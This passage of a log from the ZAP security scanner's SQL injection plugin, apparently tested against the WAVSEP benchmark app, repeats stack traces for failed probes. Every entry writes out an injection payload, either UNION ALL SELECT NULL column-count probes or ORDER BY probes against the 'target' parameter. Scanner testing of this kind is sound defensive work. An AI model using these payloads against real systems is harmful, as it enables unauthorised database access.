org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680944 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680947 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680948 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680949 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680950 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680951 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680952 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 7869#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 7869# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680953 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680954 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680955 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680956 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680957 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680958 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 